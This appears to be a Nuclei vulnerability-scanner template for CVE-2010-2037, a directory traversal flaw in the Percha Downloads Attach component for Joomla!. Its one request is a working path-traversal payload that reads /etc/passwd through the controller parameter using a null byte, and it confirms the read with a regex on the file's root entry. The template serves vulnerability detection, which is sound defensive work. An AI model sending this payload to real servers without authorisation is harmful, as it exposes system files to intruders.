nuclei-templates/cves/2010/CVE-2010-2037.yaml

28 lines
883 B
YAML

id: CVE-2010-2037
info:
name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34005
- https://www.cvedetails.com/cve/CVE-2010-2037
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200